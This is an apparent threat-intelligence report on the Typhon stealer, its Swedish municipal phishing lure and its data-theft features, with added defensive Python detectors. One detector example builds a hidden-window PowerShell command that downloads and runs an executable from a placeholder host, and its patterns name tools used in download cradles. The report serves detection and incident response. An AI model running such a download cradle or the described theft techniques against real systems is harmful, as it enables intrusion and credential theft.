Cyble-Typhon-Malware

Phishing Site used to Spread Typhon Stealer

New stealer developing Crypto Miner capabilities

During a routine threat hunting exercise, Cyble Research Labs (CRL) came across a Twitter post in which a researcher shared a URL hosting a Windows executable payload named systemupdate.exe. The researcher claims that this executable is a variant of the Typhon stealer and that it is delivered through a crafted .lnk file.

Upon analyzing the URL, we identified that it also hosts a phishing page impersonating Lindesbergs Kommun (a municipality in Örebro County in central Sweden). The page collects sensitive information such as name, Social Security Number (SSN), ORT (Swedish for the postal town), and credit/debit card details and forwards it to the Threat Actor (TA).

When the user opens the .lnk file, it runs a PowerShell command that downloads the Typhon stealer from the remote server and executes it. The image below shows the content of the .lnk file.

Figure 1 – Content of LNK File
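To triage a shortcut like this without opening it, the following added Python example (written for this page; it is not code from the original post or from Typhon) parses the StringData section of a Shell Link file as laid out in the MS-SHLLINK specification and scores the target and argument strings for download-cradle indicators. The .lnk it builds is constructed for the demonstration: the relative path, the placeholder URL http://example.invalid/systemupdate.exe and the PowerShell command line are assumptions, not the contents of the real shortcut shown in Figure 1.

```python
import re
import struct

# Shell Link header layout (MS-SHLLINK 2.1): size, CLSID, then LinkFlags at offset 20.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields follow the header (after the optional IDList/LinkInfo) in this order.
STRING_FIELDS = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]

# Download-cradle traits an analyst looks for in a shortcut's command line.
CRADLE_PATTERNS = {
    "powershell-hidden-window": re.compile(r"-w(indowstyle)?\s+h(idden)?", re.I),
    "powershell-noprofile": re.compile(r"-no(p|profile)\b", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(r"Download(File|String|Data)|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote-url": re.compile(r"https?://[^\s'\"]+", re.I),
    "start-process": re.compile(r"Start-Process|\bsaps\b", re.I),
}


def build_lnk(relative_path, arguments):
    """Assemble a minimal Unicode .lnk carrying only a relative path and arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, timestamps, icon, hotkey: zeroed
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")  # CountCharacters + chars
    return header + body


def parse_lnk_strings(data):
    """Return the StringData fields of a .lnk as a dict; IDList and LinkInfo are skipped."""
    if len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
        pos += nbytes
    return fields


def triage_lnk(data):
    """Extract target/arguments and report which download-cradle indicators match."""
    fields = parse_lnk_strings(data)
    haystack = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    hits = sorted(name for name, rx in CRADLE_PATTERNS.items() if rx.search(haystack))
    return {"fields": fields, "indicators": hits, "urls": CRADLE_PATTERNS["remote-url"].findall(haystack)}


# Constructed sample: a hidden-window PowerShell cradle that fetches and runs an executable.
SAMPLE_ARGS = (
    '-w hidden -nop -c "$p=$env:TEMP+\'\\systemupdate.exe\';'
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/systemupdate.exe',$p);"
    'Start-Process $p"'
)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

For a shortcut collected from disk, read it in binary mode and pass the bytes to triage_lnk(). Shortcuts that carry a LinkTargetIDList or LinkInfo block are skipped over correctly, but the optional ExtraData blocks after the strings are not parsed. An empty indicator list is not a clean bill of health: a shortcut can point at a dropped script instead of embedding the command line.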

Cyble Research Labs also downloaded the Windows executable and performed a deep-dive analysis of it. We observed that this malicious program is based on Prynt Stealer and can steal data from multiple applications. The developer has also added a module for delivering the XMRig cryptominer; in this sample it is not functional, which suggests either that the module is still in development or that the TA who generated this sample with the builder did not enable it.

The TA has also created a Telegram channel to communicate with prospective buyers of the Typhon stealer. The images below show that updates to the stealer are announced through this channel, where the TA is actively releasing new versions. The stealer is sold as a lifetime subscription for $50.

Figure 2 – Typhon Stealer Telegram Channel

Interestingly, the TA also offers spreading and crypting services to buyers of the stealer, as shown below.

Figure 3 – Spreading and Crypting Services Telegram Post

Technical Analysis

Phishing Page Analysis

When the user visits the URL hxxp://lindesbergparkeringsanmarkning[.]netlify[.]app, it opens a fake payment form carrying the name and logo of Lindesbergs kommun and asking the user to pay 300 SEK (Swedish krona, the national currency of Sweden).

The payment form also asks for users’ sensitive information such as name, Social Security Number (SSN), ORT, and Credit/Debit card details.

Figure 4 – Hosted Phishing Page

When the user submits the form, all the provided details are posted to Formspree at the URL hxxps://formspree[.]io/f/xknylake.

Formspree is a form backend, API, and email service for HTML forms that delivers form submissions by email without requiring any code or a server-side backend. Its services are free or very low cost, which makes it a convenient drop point for a credential-harvesting page.

Figure 5 – User Info being sent to the Server

After the submission, the website redirects the user to the Formspree acknowledgment page.

Figure 6 – Formspree Acknowledgement Page

Payload Analysis

Anti-Analysis:

(Sample SHA256: 67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec)

If the TA enabled the anti-analysis option when building the malware, the stealer first performs various anti-analysis checks. Each check returns true when it detects an antivirus product or a sandbox environment, in which case the malware terminates itself with a fake error message.

The malware uses the GetModuleHandle() function to check whether any of the following DLLs, which sandbox and antivirus products inject into running processes, are loaded in its own process:

DLL            Associated product
SbieDll.dll    Sandboxie
SxIn.dll       360 Total Security
Sf2.dll        Avast Antivirus
snxhk.dll      Avast Antivirus
cmdvrt32.dll   COMODO

The stealer also checks whether any of the following analysis tools are running and, if so, terminates to hinder analysis:

  • processhacker
  • netstat
  • netmon
  • tcpview
  • Wireshark
  • filemon
  • regmon
  • cain

The stealer calls the CheckRemoteDebuggerPresent() function to determine whether its process is being debugged. It also uses Windows Management Instrumentation (WMI) queries to detect a virtual environment, as shown below.

Figure 7 – Using WMI queries

The stealer also checks for a mutex named “GOJJL2LPIZM04XC0NQ4I” to ensure that only one instance is running on the victim's machine; if the mutex already exists, it exits.

The stealer can also spread through removable media: it copies itself to each mounted drive under the name “USB-Service”.

The stealer can also copy itself into the Startup folder to establish persistence, so that it is executed automatically each time the user logs in.

The stealer creates a hidden folder under the user's Local AppData directory to store the stolen data. The folder is named with the MD5 hash of a string formed by concatenating the username, computer name, culture, processor name, and video controller name.

Inside it, the stealer creates a second folder named “Username@ComputerName_Culture”.
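To locate this staging folder on a suspected host during incident response, the following added Python example (not code from the report or from Typhon) reproduces the naming scheme and, because the WMI-derived processor and video-controller names are rarely at hand, also hunts for the folder by shape: a 32-hex-character directory under Local AppData that contains a user@host_culture subfolder. It assumes the five values are concatenated with no separator and hashed to a lowercase hex MD5, and assumes that the artifact names from the later sections of this report (logs\keylogger, FileZilla\Hosts.txt, Pidgin Accounts.txt, Gaming\Minecraft, Wallets) sit directly under the inner folder; the report gives the inputs and the names but not these details.

```python
import hashlib
import os
import re
import shutil
import tempfile

# Artifact names from the report, relative to the inner (user@host_culture) folder.
# Their placement directly under that folder is an assumption.
EXPECTED_ARTIFACTS = [
    os.path.join("logs", "keylogger"),
    os.path.join("FileZilla", "Hosts.txt"),
    os.path.join("Messenger", "Pidgin Accounts.txt"),
    os.path.join("Gaming", "Minecraft"),
    "Wallets",
]
OUTER_NAME = re.compile(r"^[0-9a-f]{32}$")  # lowercase MD5 hex digest (assumed case)
# user@host_culture, e.g. alice@DESKTOP-01_en-US; hosts with '_' in their name would not match.
INNER_NAME = re.compile(r"^[^@\\/]+@[^_\\/]+_[A-Za-z]{2,3}(-[A-Za-z0-9]{2,8})?$")


def staging_folder_names(username, computer_name, culture, processor, video_controller):
    """(outer, inner) folder names derived from host attributes. On a live Windows host the
    last two come from Win32_Processor.Name and Win32_VideoController.Name via WMI."""
    seed = f"{username}{computer_name}{culture}{processor}{video_controller}"  # no separator: assumed
    outer = hashlib.md5(seed.encode("utf-8")).hexdigest()
    inner = f"{username}@{computer_name}_{culture}"
    return outer, inner


def hunt_staging_dirs(local_appdata):
    """Find candidate staging folders by shape alone and list which known artifacts they hold."""
    hits = []
    for outer in os.listdir(local_appdata):
        outer_path = os.path.join(local_appdata, outer)
        if not (OUTER_NAME.match(outer) and os.path.isdir(outer_path)):
            continue
        for inner in os.listdir(outer_path):
            root = os.path.join(outer_path, inner)
            if INNER_NAME.match(inner) and os.path.isdir(root):
                found = [a for a in EXPECTED_ARTIFACTS if os.path.exists(os.path.join(root, a))]
                hits.append({"staging_root": root, "artifacts": found})
    return hits


def demo():
    """Constructed Local AppData tree holding a staging folder for 'alice' on DESKTOP-01."""
    outer, inner = staging_folder_names("alice", "DESKTOP-01", "en-US",
                                        "Intel(R) Core(TM) i7", "Intel(R) UHD Graphics")
    tmp = tempfile.mkdtemp()
    try:
        root = os.path.join(tmp, outer, inner)
        for rel in (os.path.join("logs", "keylogger"), "FileZilla", "Wallets"):
            os.makedirs(os.path.join(root, rel))
        with open(os.path.join(root, "FileZilla", "Hosts.txt"), "w") as fh:
            fh.write("ftp.example.invalid\n")
        os.makedirs(os.path.join(tmp, "Microsoft", "Windows"))  # unrelated sibling folder
        return hunt_staging_dirs(tmp)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    print(demo())
```

On a real host, point hunt_staging_dirs() at %LocalAppData% (os.environ["LOCALAPPDATA"]); the hidden attribute the stealer sets does not stop os.listdir() from seeing the folder. If the hash-based name does not match because the separator or digest case is different from what is assumed here, the shape-based hunt still finds the folder.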

Clipper

A clipper lets the TA steal cryptocurrency by replacing a wallet address in the victim's clipboard with the TA's own address, so that a payment the victim pastes goes to the attacker. Typhon Stealer can clip addresses of the following cryptocurrencies:

  • Ethereum (ETH)
  • Bitcoin (BTC)
  • XRP (XRP)
  • Stellar (XLM)
  • Monero (XMR)
  • Bitcoin Cash (BCH)
  • Litecoin (LTC)

The figure below shows the Base64-encoded regular expressions used to recognize the respective address formats in the clipboard.

Figure 8 – Encoded RegEx
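A clipper has one observable tell: an address of some coin is copied and, within a fraction of a second, the clipboard holds a different address of the same coin. The following added Python example (written for this page, not code from the report or from Typhon) classifies clipboard contents with its own approximate address patterns for the seven coins listed above and raises an alert on that substitution. The patterns are this example's assumptions, not the Base64-encoded regexes shipped in the stealer, and the clipboard timeline is constructed; the two Bitcoin addresses in it are well-known public examples.

```python
import re

# Approximate address formats, most specific first. These are illustrative and are not
# the stealer's own regexes; Monero and XRP/Stellar use case-sensitive alphabets.
ADDRESS_PATTERNS = [
    ("ETH", re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("BTC", re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$")),
    ("LTC", re.compile(r"^([LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[a-z0-9]{25,62})$")),
    ("BCH", re.compile(r"^(bitcoincash:)?[qp][a-z0-9]{41}$")),
    ("XMR", re.compile(r"^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$")),
    ("XRP", re.compile(r"^r[1-9A-HJ-NP-Za-km-z]{24,34}$")),
    ("XLM", re.compile(r"^G[A-Z2-7]{55}$")),
]


def classify_address(text):
    """Return the coin whose address format `text` matches, or None."""
    text = text.strip()
    for coin, rx in ADDRESS_PATTERNS:
        if rx.match(text):
            return coin
    return None


def detect_clipper(snapshots, window_seconds=2.0):
    """Flag consecutive clipboard snapshots where an address of a coin is replaced by a
    different address of the same coin within `window_seconds`. A user does not retype a
    wallet address that quickly; a clipper overwrites it as soon as it lands."""
    alerts = []
    for (t_prev, prev), (t_cur, cur) in zip(snapshots, snapshots[1:]):
        coin_prev, coin_cur = classify_address(prev), classify_address(cur)
        if (coin_prev and coin_prev == coin_cur
                and prev.strip() != cur.strip()
                and t_cur - t_prev <= window_seconds):
            alerts.append({"coin": coin_cur, "original": prev.strip(),
                           "replacement": cur.strip(), "seconds": t_cur - t_prev})
    return alerts


# Constructed clipboard timeline: (seconds since start, clipboard text).
SAMPLE_TIMELINE = [
    (0.0, "meeting notes"),
    (5.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    (5.3, "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"),   # different BTC address 300 ms later: clipped
    (60.0, "0x" + "ab" * 20),
    (61.0, "0x" + "ab" * 20),                      # same ETH address re-copied: benign
    (120.0, "0x" + "cd" * 20),                     # different ETH address, but 59 s later: benign
]

if __name__ == "__main__":
    for alert in detect_clipper(SAMPLE_TIMELINE):
        print(alert)
```

To use this live, feed detect_clipper() a rolling list of (timestamp, text) samples from a clipboard listener; the replacement address each alert records is the attacker's wallet and can be blocklisted or reported. The patterns overlap at the edges (a P2SH Bitcoin address and a legacy Litecoin address both start with 3 in some encodings), so treat the coin label as a hint and the substitution itself as the signal.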

Keylogger

The stealer can also log keystrokes. It runs the keylogger in a separate thread and saves the captured keystrokes under the “logs\keylogger\” folder. The figure below shows the keylogger functionality.

Figure 9 – Keylogger Functionality

Browsers

This Typhon sample targets three browser families:

  • Chromium-based browsers
  • Microsoft Edge
  • Firefox-based browsers

Typhon stealer targets over 30 Chromium-based browsers, more than five Mozilla-based browsers, and Microsoft Edge. Each browser stores its profile data, including saved login credentials, cookies, and autofill data, in files under its AppData directory, and these files are what the stealer collects. The figure below shows the browser directories targeted by the stealer.

Figure 10 – Targeted Browsers

FTP Applications

Typhon stealer targets two FTP applications:

  • FileZilla
  • WinSCP

FileZilla is a free and open-source, cross-platform FTP application. The stealer reads saved connection details from FileZilla's “sitemanager.xml” and “recentservers.xml” files and writes them to a “Hosts.txt” file under the “FileZilla” folder for exfiltration.

Figure 11 – Stealing User Data from FileZilla

WinSCP is a popular SFTP and FTP client for Windows that stores saved session data in the registry. Typhon stealer reads the WinSCP session data from the “Software\Martin Prikryl\WinSCP 2\Sessions” registry key.

Figure 12 – Stealing WinSCP data from Registry

Gaming

Typhon Stealer targets the following gaming applications and steals sensitive data related to them from the victim's machine.

  • Steam
  • Minecraft
  • Uplay

Steam:

The malware locates the Steam installation by reading the registry value under HKEY_LOCAL_MACHINE\Software\Valve\Steam. It then enumerates the subkeys under HKEY_LOCAL_MACHINE\Software\Valve\Steam\Apps to obtain details of the installed applications, as shown in the figure below. The malware also targets Steam's SSFN file, known as the authorization file, and copies it for exfiltration.

Figure 13 – Targeting Steam

Uplay:

The malware looks for the “Ubisoft Game Launcher” folder in the AppData directory; if it is present, it copies all of its files for exfiltration.

Figure 14 – Copying Uplay Files

Minecraft:

For Minecraft, the stealer checks whether the “.minecraft” folder is present under the AppData directory. If it is, the stealer creates a folder named “Minecraft” under the “Gaming” folder to save the stolen data.

It copies “launcher_profiles.json,” “servers.dat,” and screenshots to the “Minecraft” folder for exfiltration. It also extracts the lists of installed mods and versions and saves them in text files created in the same folder.

Figure 15  – Stealing Data from Minecraft

Messaging Applications

The Typhon stealer targets the following messaging applications:

  • Discord
  • Telegram
  • Pidgin

The malware first creates a folder named “Messenger” to hold the data collected from these applications. To steal Discord tokens, it searches the following directories:

  • Discord\Local Storage\leveldb
  • discordptb\Local Storage\leveldb
  • Discord Canary\leveldb

The malware steals Telegram sessions by copying files from the “Telegram Desktop\tdata” folder. For Pidgin, it first checks whether “.purple\accounts.xml” is present in the AppData folder; if so, it extracts the login credentials and protocol details and saves them to the “Pidgin Accounts.txt” file, as shown below.

Figure 16 – Stealing Pidgin Login Credentials

VPN

This stealer collects credentials from three VPN clients: ProtonVPN, OpenVPN, and NordVPN.

The malware first checks whether a targeted VPN client is installed by looking for the directory C:\Users\[username]\AppData\Local\[VPN name], as shown in the figure below.

Figure 17 – Checking Installed VPNs

If a targeted VPN client is installed, the stealer reads the credentials from its configuration files, such as user.config, and copies the configuration file to the folder used for storing stolen data.

Wallets

Typhon Stealer targets cryptocurrency wallets, as shown in the figure below. The stealer creates a folder named “Wallets” and then iterates over a list of Base64-encoded wallet paths to determine whether a wallet is present on the victim's system.

It also targets the Bitcoin, Dash, and Litecoin core wallets by reading their data paths from the registry key HKEY_CURRENT_USER\Software\<Coin>\<Coin>-Qt.

Figure 18 – Targeting Cold Crypto Wallets

Grabber

This stealer grabs files from the Desktop, My Pictures, Personal (Documents), Downloads, OneDrive, and Dropbox directories. It only grabs files smaller than 5 MB with one of the extensions listed below.

Type          Extensions
Document      pdf, rtf, doc, docx, xls, xlsx, ppt, pptx, indd, txt, json
Database      db, db3, db4, kdb, kdbx, sql, sqlite, mdf, mdb, dsk, dbf, wallet, ini
Source code   c, cs, cpp, asm, sh, py, pyw, html, css, php, go, js, rb, pl, swift, java, kt, kts, ino
Image         jpg, jpeg, png, bmp, psd, svg, ai
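The practical question for an affected user is what the grabber would have taken. The following added Python example (written for this page, not code from the report or from Typhon) applies the grabber's criteria above to a user profile and tallies the exposure by category. It assumes the extension match is case-insensitive (the mixed-case list in the report suggests so), that "5MB" means 5 × 1024 × 1024 bytes, and that "Personal" and "My Pictures" are the .NET SpecialFolder names for the Documents and Pictures folders; the profile it scans is constructed in a temporary directory.

```python
import os
import shutil
import tempfile

# Extension table from the report, lower-cased. kdb/kdbx are KeePass vaults, .wallet files are
# cryptocurrency wallets, .ini and .json files often hold saved credentials or API keys.
GRABBER_EXTENSIONS = {
    "Document": {"pdf", "rtf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "indd", "txt", "json"},
    "Database": {"db", "db3", "db4", "kdb", "kdbx", "sql", "sqlite", "mdf", "mdb", "dsk", "dbf", "wallet", "ini"},
    "SourceCode": {"c", "cs", "cpp", "asm", "sh", "py", "pyw", "html", "css", "php", "go", "js", "rb",
                   "pl", "swift", "java", "kt", "kts", "ino"},
    "Image": {"jpg", "jpeg", "png", "bmp", "psd", "svg", "ai"},
}
MAX_SIZE = 5 * 1024 * 1024  # "smaller than 5MB"; binary megabytes assumed
# Folders under the user profile; Pictures/Documents are the .NET "My Pictures"/"Personal" folders.
GRABBER_DIRS = ["Desktop", "Pictures", "Documents", "Downloads", "OneDrive", "Dropbox"]


def grabber_category(path, size):
    """Category the stealer would file `path` under, or None if it would be skipped."""
    if size >= MAX_SIZE:
        return None
    ext = os.path.splitext(path)[1].lstrip(".").lower()  # case-insensitive match assumed
    for category, exts in GRABBER_EXTENSIONS.items():
        if ext in exts:
            return category
    return None


def assess_exposure(user_profile):
    """Walk the grabbed folders and tally what the stealer would collect from this profile."""
    summary = {c: {"files": 0, "bytes": 0} for c in GRABBER_EXTENSIONS}
    taken = []
    for folder in GRABBER_DIRS:
        for root, _dirs, files in os.walk(os.path.join(user_profile, folder)):  # missing folder: no-op
            for name in files:
                path = os.path.join(root, name)
                try:
                    size = os.path.getsize(path)
                except OSError:
                    continue
                category = grabber_category(path, size)
                if category:
                    summary[category]["files"] += 1
                    summary[category]["bytes"] += size
                    taken.append(os.path.relpath(path, user_profile))
    return summary, sorted(taken)


def demo():
    """Constructed profile: three grabbable files, one oversized PDF and one executable."""
    profile = tempfile.mkdtemp()
    try:
        files = {
            ("Desktop", "notes.txt"): b"todo: rotate keys\n",
            ("Desktop", "vault.kdbx"): b"\x03\xd9\xa2\x9a" + b"\x00" * 100,        # KeePass 2 magic, padded
            ("Downloads", "setup.exe"): b"MZ" + b"\x00" * 64,                     # not in the extension list
            ("Pictures", "holiday", "IMG_0001.JPG"): b"\xff\xd8\xff" + b"\x00" * 32,
        }
        for parts, content in files.items():
            path = os.path.join(profile, *parts)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        with open(os.path.join(profile, "Downloads", "manual.pdf"), "wb") as fh:
            fh.truncate(6 * 1024 * 1024)   # 6 MB sparse file: over the grabber's size limit
        return assess_exposure(profile)
    finally:
        shutil.rmtree(profile)


if __name__ == "__main__":
    print(demo())
```

Run assess_exposure() against a real profile path (os.path.expanduser("~") on the affected account) to produce the list of files to treat as compromised; anything in the Database category, KeePass vaults in particular, should be assumed cracked offline and its contents rotated.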

It also collects system information such as hardware details, OS details, and Windows product keys. The figure below shows a sample of the system information collected by the stealer. The stealer can also capture pictures from the victim's webcam.

Figure 19 – Stealing System Info

Exfiltration

Besides exfiltrating data to the TA's Telegram channel, the stealer can upload the stolen data to AnonFiles, a file-hosting service that lets users upload and share files anonymously. The figure below shows the AnonFiles upload functionality.

Figure 20 – Exfiltrating Data to AnonFiles
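Both the phishing page (which posts its form to Formspree, as described in the phishing page analysis above) and the stealer (which sends data to Telegram and AnonFiles) rely on legitimate web services for egress, which is where network detection can catch them. The following added Python example (written for this page, not code from the report or from Typhon) runs three such rules over constructed proxy log lines. The Telegram Bot API path shape (/bot<token>/sendDocument) and the AnonFiles upload endpoint are taken from those services' public API documentation and are assumptions about how this sample uses them; the formspree.io/f/<id> path is the one the phishing page posts to; the log format, client addresses and bot token are constructed.

```python
import re
from urllib.parse import urlsplit

# (rule name, host pattern, path pattern). The Telegram rule captures the bot token,
# which identifies the attacker's bot and can be reported to Telegram.
EXFIL_RULES = [
    ("telegram-bot-api", re.compile(r"^api\.telegram\.org$"),
     re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(sendDocument|sendMessage|sendPhoto)$")),
    ("anonfiles-upload", re.compile(r"^api\.anonfiles\.com$"), re.compile(r"^/upload$")),
    ("formspree-post", re.compile(r"^formspree\.io$"), re.compile(r"^/f/[A-Za-z0-9]+$")),
]

# Constructed proxy log: timestamp client method url status bytes_out
SAMPLE_LOG = """\
2022-08-28T10:01:02Z 10.0.0.12 GET https://www.example.com/ 200 512
2022-08-28T10:01:05Z 10.0.0.12 POST https://formspree.io/f/xknylake 302 948
2022-08-28T10:03:40Z 10.0.0.12 POST https://api.telegram.org/bot1234567890:AAFexampleTOKENexampleTOKENexample/sendDocument 200 2483117
2022-08-28T10:03:41Z 10.0.0.12 GET https://api.telegram.org/bot1234567890:AAFexampleTOKENexampleTOKENexample/getMe 200 120
2022-08-28T10:04:10Z 10.0.0.12 POST https://api.anonfiles.com/upload 200 3017233
2022-08-28T10:05:00Z 10.0.0.33 GET https://formspree.io/ 200 4096
"""


def detect_exfil(log_text, min_bytes=0):
    """Return one alert per POST to a known drop point, with any bot token pulled out
    and redacted from the logged URL. `min_bytes` lets a caller ignore small posts."""
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # malformed line
        ts, client, method, url, _status, bytes_out = parts
        if method != "POST" or int(bytes_out) < min_bytes:
            continue
        u = urlsplit(url)
        host, path = (u.hostname or "").lower(), u.path
        for rule, host_rx, path_rx in EXFIL_RULES:
            m = path_rx.match(path)
            if host_rx.match(host) and m:
                token = m.groupdict().get("token")
                alerts.append({
                    "rule": rule,
                    "timestamp": ts,
                    "client": client,
                    "url": url.replace(token, "<redacted>") if token else url,
                    "bot_token": token,
                    "bytes_out": int(bytes_out),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_exfil(SAMPLE_LOG):
        print(alert)
```

The Telegram and AnonFiles rules are high-confidence on a corporate network where neither service has a business use; the bytes_out value on those hits is the volume that left. Formspree is used by legitimate sites, so treat the formspree-post rule as investigation context (which client submitted to which form id, and whether that id is tied to a known phishing page) rather than as a standalone blocking rule.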

Other Functionalities

The stealer also contains code for downloading XMRig, a cryptominer. In this sample the feature is not functional, but we suspect that TAs might use Typhon Stealer to deliver cryptominers in the future.

Figure 21 – XMRig Downloader

Conclusion

Threat Actors continuously refine their techniques to target users across sectors, including government organizations and industries from various domains. In this case, they used the theme of Lindesbergs Kommun to lure users and deploy the Typhon stealer payload.

In the past, Cyble has observed numerous data breaches in prominent organizations caused by such malicious programs. Organizations and individuals are advised to follow industry-standard cybersecurity practices to protect themselves.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow them:

How to prevent malware infection?

  • Avoid downloading pirated software from warez/torrent websites. “Hack tools” promoted on sites such as YouTube and torrent sites frequently carry such malware.
  • Use strong passwords and enforce multi-factor authentication wherever possible. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity. 
  • Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
  • Monitor network traffic for beaconing to detect and block data exfiltration by malware or TAs.
  • Deploy a Data Loss Prevention (DLP) solution on employees' systems.

MITRE ATT&CK® Techniques

Tactic               Technique ID  Technique Name
Initial Access       T1566         Phishing
Execution            T1204         User Execution
Defense Evasion      T1497.001     Virtualization/Sandbox Evasion: System Checks
Credential Access    T1555         Credentials from Password Stores
Credential Access    T1539         Steal Web Session Cookie
Credential Access    T1552         Unsecured Credentials
Credential Access    T1528         Steal Application Access Token
Collection           T1113         Screen Capture
Discovery            T1087         Account Discovery
Discovery            T1518         Software Discovery
Discovery            T1057         Process Discovery
Discovery            T1124         System Time Discovery
Discovery            T1007         System Service Discovery
Discovery            T1614         System Location Discovery
Command and Control  T1095         Non-Application Layer Protocol
Exfiltration         T1041         Exfiltration Over C&C Channel
Exfiltration         T1567         Exfiltration Over Web Service

Indicators of Compromise (IOCs)

Typhon Stealer payload
  MD5:      a1f146eb008f077be809ab4e61f46f4e
  SHA-1:    8af9fc9aa7517ac327cc8692c2adf54537f39fe5
  SHA-256:  e04e65ddad749789f4f05bb88e2c8bde8df9263950eb120ad1191f217ca0c742

Typhon Stealer payload
  MD5:      79dc4a4192469c3e697afd81409a52da
  SHA-1:    51aa7b94b3f3921d21e730b113faa20e0f6b6902
  SHA-256:  48133d1aaf1a47f63ec73781f6a2b085b28174895b5865b8993487daec373e0a

Typhon Stealer payload
  MD5:      77f7d71475362232d13adbdb19e876ff
  SHA-1:    7c4ff5acfc57573279c9abc6779a8bc547b23d12
  SHA-256:  d68f00429a5f39c718cc704ee11e8e10d37c8ffc831630d753c922269bc01b86

Typhon Stealer payload
  MD5:      ce4675c0ab630d8e1e89eb7c9d23188d
  SHA-1:    b4d71ad21f6f6cff7d297bbe1431a007b0d3e792
  SHA-256:  524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b

Typhon Stealer payload (sample analyzed in this report)
  SHA-256:  67afd1f116ffcf84c59bef3d3b925dc82dadebc21f2e8cc39b77892104b9e9ec

URL hosting the phishing page and the Typhon Stealer payload
  hxxp://lindesbergparkeringsanmarkning[.]netlify[.]app

Formspree endpoint receiving the phishing form submissions
  hxxps://formspree[.]io/f/xknylake